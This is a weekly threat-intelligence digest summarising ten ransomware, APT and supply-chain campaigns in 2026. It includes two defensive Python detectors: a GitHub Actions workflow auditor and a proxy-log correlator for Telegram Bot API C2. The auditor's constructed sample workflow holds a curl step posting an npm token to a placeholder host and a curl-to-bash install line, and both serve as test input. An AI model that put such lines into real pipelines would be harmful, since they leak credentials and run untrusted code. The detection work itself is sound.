Threat Radar: Top 10 Active Threats, APTs & Dark Web Alerts (This Week)
1. Qilin Ransomware (RaaS) — Most Active Global Threat
Qilin (also known as Agenda) remains the world’s most active ransomware group in 2026, leading both disclosed and undisclosed attack charts. It was responsible for 22% of Q1 2026 ransomware attacks in disclosed incidents (22/264 attacks) and 339 undisclosed attacks (16% share). Qilin targets healthcare, manufacturing, government, and education using double-extortion, BYOVD (Bring Your Own Vulnerable Driver) for EDR bypass, and a 2025-added DDoS pressure capability.
Source: BlackFog Q1 2026 Report / CybelAngel — https://www.blackfog.com/the-state-of-ransomware-2026/
2. The Gentlemen RaaS — Internal Breach Reveals 1,570+ Victims
The Gentlemen ransomware-as-a-service group, which emerged in mid-2025, suffered a significant internal C2 infrastructure breach in early May 2026, revealing over 1,570 linked victims — far more than the 412 publicly listed on their leak site. The group offers affiliates a 90% revenue share and has claimed ~332 published victims in the first five months of 2026 alone. Check Point Research confirmed 8 unique affiliate TOX IDs and 29 documented campaigns.
Source: Check Point Research / Shieldworkz — https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/
3. TeamPCP — New Threat Syndicate Behind Supply Chain Wave
TeamPCP is a newly identified threat syndicate responsible for the Megalodon GitHub Actions attack, the TanStack/Mini Shai-Hulud npm supply chain campaign, and the related Grafana and GitHub breaches this week. The group uses information stealer infections to harvest developer GitHub credentials, then automates mass repository backdooring via CI/CD pipelines. The Cloud Security Alliance has designated this as a two-wave AI developer supply chain attack.
Source: Cloud Security Alliance / Ossprey — https://labs.cloudsecurityalliance.org/research/csa-research-note-shai-hulud-megalodon-supply-chain-cascade/
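The backdooring described above lands in CI/CD as ordinary-looking workflow changes, so one practical check is to audit every .github/workflows file for the patterns such a backdoor needs: a third-party action pinned only to a mutable tag, a run step that ships a repository secret to an external host, and a download piped straight into a shell. The Python below is an added example written for this digest, not code from the Cloud Security Alliance, Ossprey, or any project named here; the sample workflow is constructed, the regex heuristics are the author's own assumptions about what "risky" looks like, and it deliberately avoids a YAML library so it runs offline.

```python
import re

# Constructed sample workflow (not a real repository's file), modelled on the pattern
# described above: one third-party action pinned only to a mutable tag, one step that
# posts a repository secret to an external host, and one step that pipes a download to bash.
SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608
      - uses: some-org/setup-tool@v2
      - name: build
        run: npm ci && npm test
      - name: telemetry
        run: curl -s -X POST https://example.invalid/c -d "$NPM_TOKEN"
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
      - name: bootstrap
        run: curl -sSL https://example.invalid/install.sh | bash
"""

STEP_START = re.compile(r"^(\s*)-\s+\S")                 # any YAML list item
STEP_KEY = re.compile(r"^\s*-\s+(uses|name|run|id):")     # list item that looks like a step
SHA_PIN = re.compile(r"@[0-9a-f]{40}$")                   # action pinned to a full commit SHA
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|k)?sh\b")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat)\b")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")


def split_steps(text):
    """Return (line_no, [lines]) for each step block.

    Steps are the list items at the indentation of the first '- uses:' / '- name:' /
    '- run:' item, so no YAML parser is needed for this heuristic scan.
    """
    steps, indent = [], None
    for i, line in enumerate(text.splitlines(), 1):
        m = STEP_START.match(line)
        if m and indent is None and STEP_KEY.match(line):
            indent = m.group(1)
        if m and indent is not None and m.group(1) == indent:
            steps.append((i, [line]))
        elif steps:
            steps[-1][1].append(line)
    return steps


def audit_workflow(text):
    """Return (step_line, finding, detail) tuples for steps matching a risky pattern."""
    findings = []
    for line_no, block in split_steps(text):
        body = "\n".join(block)
        m = re.search(r"uses:\s*(\S+)", body)
        if m:
            ref = m.group(1)
            # Local actions (./path) live in the repo itself; anything else should be SHA-pinned,
            # because a tag like @v2 can be moved to a backdoored commit after the fact.
            if not ref.startswith("./") and not SHA_PIN.search(ref):
                findings.append((line_no, "unpinned-action", ref))
        run_at = body.find("run:")
        if run_at >= 0:
            cmd = body[run_at + 4:]  # the run script plus any env:/with: lines after it
            first_line = cmd.strip().splitlines()[0]
            if PIPE_TO_SHELL.search(cmd):
                findings.append((line_no, "pipe-to-shell", first_line))
            # A network tool in the same step as a secrets.* reference is the exfil shape.
            if NET_TOOL.search(cmd) and SECRET_REF.search(body):
                findings.append((line_no, "secret-to-network", first_line))
    return findings


if __name__ == "__main__":
    for step_line, kind, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"step at line {step_line}: {kind}: {detail}")
```

Run it over every workflow file in a repository (or as a pre-merge check) and treat any finding on a workflow that was changed by a token-authenticated push as a signal to pull the commit and rotate the credentials involved; the heuristics are intentionally coarse and will need tuning for repositories whose workflows legitimately call curl with secrets.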
4. Salt Typhoon (PRC) — Persistent Telecom & Government Espionage
Salt Typhoon, the China-aligned APT, is confirmed to have achieved deep, persistent access to U.S. government communications networks in January 2026 and continues to expand its footprint. The related group UAT-7290 is simultaneously targeting U.S. and allied telecoms through edge-device vulnerability exploitation. Salt Typhoon was one of the dominant APT groups of 2025 and has continued sustained operations in 2026 against government and telecommunications networks.
Source: Trend Micro / CloudSEK — https://www.trendmicro.com/en_us/research/26/d/us-public-sector-under-siege.html
5. Handala (Iranian MOIS) — Targeting Military Personnel via WhatsApp
Handala (also known as Void Manticore, Storm-0842, BANISHED KITTEN) is conducting active campaigns targeting military personnel in the Gulf region, sending spoofed WhatsApp business messages warning of missile and drone strikes to deliver malware. The group previously conducted the infamous Stryker attack (March 2026), wiping 200,000 devices through compromised Microsoft Intune in under five hours — with no malware deployed, using only legitimate MDM commands.
Source: Help AG / CovertSwarm — https://www.helpag.com/top-middle-east-cyber-threats-06-may-2026/
6. APT34 / OilRig (Iran) — MENA Spear-Phishing Escalation
APT-C-49 / OilRig (APT34) is conducting sophisticated spear-phishing campaigns using macro-enabled Excel files themed on Middle East regional events, with macros triggering multi-stage C# attacks that retrieve data from GitHub, extract steganographic content from Google Drive images, and establish persistence via scheduled tasks with Telegram Bot API C2 channels. The campaign specifically targets Gulf government, financial, and telecom sectors.
Source: Help AG / RH-ISAC — https://www.helpag.com/top-middle-east-cyber-threats-06-may-2026/
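The chain in item 6 leaves a recognisable trail in web proxy telemetry: an Office or script host fetching from GitHub, then from Google Drive, then posting to the Telegram Bot API (whose URLs always take the form https://api.telegram.org/bot<token>/<method>), all on one endpoint within minutes. The Python below is an added example for this digest, not code from Help AG, RH-ISAC, or any vendor named here; the proxy log lines and the bot token in them are constructed, and the log field layout and the list of "script host" process names are the author's assumptions that would need mapping onto a real proxy's schema.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log (not real telemetry). Fields: time host process method url status.
# ws-117 shows the full staged chain from the text; ws-042 and ws-203 are benign controls.
PROXY_LOG = """\
2026-05-06T09:12:01Z ws-117 chrome.exe GET https://www.example.com/ 200
2026-05-06T09:12:44Z ws-117 excel.exe GET https://raw.githubusercontent.com/example-org/notes/main/stage2.txt 200
2026-05-06T09:13:02Z ws-117 powershell.exe GET https://drive.google.com/uc?id=EXAMPLE_FILE_ID 200
2026-05-06T09:13:30Z ws-117 powershell.exe POST https://api.telegram.org/bot123456789:AAEXAMPLETOKENexampletoken00000000/sendMessage 200
2026-05-06T09:20:15Z ws-042 chrome.exe GET https://web.telegram.org/ 200
2026-05-06T09:31:00Z ws-203 powershell.exe GET https://raw.githubusercontent.com/example-org/tools/main/build.ps1 200
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST|CONNECT) (\S+) (\d{3})$")
# Bot API URL shape: /bot<numeric id>:<token>/<method>. The token charset is an assumption.
TELEGRAM_BOT = re.compile(r"^https?://api\.telegram\.org/bot\d+:[A-Za-z0-9_-]{20,}/\w+")
# Processes that should never be talking to a bot C2 channel (assumed list, extend to taste).
SCRIPT_HOSTS = {
    "excel.exe", "winword.exe", "powerpnt.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}
# Ordered stages of the chain described in item 6, keyed by destination host.
STAGES = (
    ("github-fetch", {"raw.githubusercontent.com", "github.com", "objects.githubusercontent.com"}),
    ("gdrive-fetch", {"drive.google.com", "drive.usercontent.google.com"}),
    ("telegram-c2", {"api.telegram.org"}),
)


def parse_log(text):
    """Parse proxy lines into dicts; malformed lines are skipped rather than crashing the scan."""
    records = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, host, proc, method, url, status = m.groups()
        records.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "process": proc.lower(), "method": method,
            "url": url, "status": int(status),
        })
    return records


def _dest_host(url):
    m = re.match(r"^https?://([^/]+)", url)
    return m.group(1).lower() if m else ""


def flag_bot_api_beacons(records):
    """Single-event rule: a script/Office host using the Telegram Bot API at all."""
    return [r for r in records if r["process"] in SCRIPT_HOSTS and TELEGRAM_BOT.match(r["url"])]


def staged_chain_hosts(records, window=timedelta(minutes=10)):
    """Correlation rule: hosts where script/Office processes hit all STAGES in order within window."""
    by_host = defaultdict(list)
    for r in records:
        if r["process"] in SCRIPT_HOSTS:
            by_host[r["host"]].append(r)
    flagged = []
    for host, recs in by_host.items():
        recs.sort(key=lambda r: r["time"])
        stage, first = 0, None
        for r in recs:
            if stage < len(STAGES) and _dest_host(r["url"]) in STAGES[stage][1]:
                if first is None:
                    first = r["time"]
                stage += 1
                if stage == len(STAGES):
                    if r["time"] - first <= window:
                        flagged.append(host)
                    break
    return sorted(flagged)


def redact_token(url):
    """Mask the bot token before the URL goes into a ticket or SIEM alert."""
    return re.sub(r"/bot(\d+):[A-Za-z0-9_-]+/", r"/bot\1:<redacted>/", url)


if __name__ == "__main__":
    recs = parse_log(PROXY_LOG)
    for r in flag_bot_api_beacons(recs):
        print(f"beacon: {r['host']} {r['process']} -> {redact_token(r['url'])}")
    print("staged chain on:", staged_chain_hosts(recs))
```

The single-event rule is cheap and fires on its own; the staged rule is what separates this campaign's shape from a lone developer's Telegram notification script, and the token redaction keeps the C2 credential out of shared alert text.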
7. Lazarus / BlueNoroff (DPRK) — Web3 & Crypto Deep Fake Attacks
BlueNoroff (a Lazarus Group sub-cluster) is conducting targeted attacks against Web3 and cryptocurrency organizations using fake Zoom invitations that redirect victims to malicious webcam-capture interfaces. The group steals cryptocurrency wallet credentials, hijacks Telegram sessions, and then uses the stolen data to generate deepfake content for more convincing follow-on social engineering. This activity is part of North Korea’s continued state-sponsored cryptocurrency theft operations.
Source: Help AG — https://www.helpag.com/top-middle-east-cyber-threats-06-may-2026/
8. Interlock Ransomware — Exploiting Cisco FMC CVE-2026-20131
Recorded Future’s Insikt Group confirmed that the Interlock ransomware group is actively exploiting CVE-2026-20131, a critical deserialization-of-untrusted-data vulnerability in Cisco Secure Firewall Management Center (FMC), to execute arbitrary Java code as root on vulnerable perimeter devices. This technique allows unauthenticated remote initial access without any user interaction, giving Interlock a highly efficient network entry vector for enterprises running unpatched Cisco FMC.
Source: Recorded Future — https://www.recordedfuture.com/blog/march-2026-cve-landscape
9. Dark Web: Gentlemen RaaS Breach & Affiliate Data Leak
The May 2026 breach of The Gentlemen’s internal Rocket database has created significant dark web activity, with affiliate profiles, victim lists, and negotiation logs now circulating on underground forums. The breach exposes the professional RaaS operational model including legal support features (“Call Lawyer”), affiliate recruitment channels, and the full scope of double-extortion operations across manufacturing, healthcare, and insurance sectors in APAC, MENA, and the Americas.
Source: Ransomware.live / Check Point Research — http://www.ransomware.live/group/thegentlemen
10. Agentic AI in Attack Chains — Fully Autonomous Ransomware Recon
Threat actors are now deploying agentic AI to autonomously handle reconnaissance, vulnerability scanning, victim prioritization, and ransom negotiations — dramatically reducing the human effort required per attack. The Tsundere Bot, a purpose-built initial access tool, automates credential theft and persistence as a ransomware precursor. IBM X-Force reports a 49% year-on-year increase in active ransomware groups, many now leveraging AI as part of their operational pipeline.
Source: Trend Micro / IBM X-Force 2026 — https://www.trendmicro.com/en_us/research/26/d/us-public-sector-under-siege.html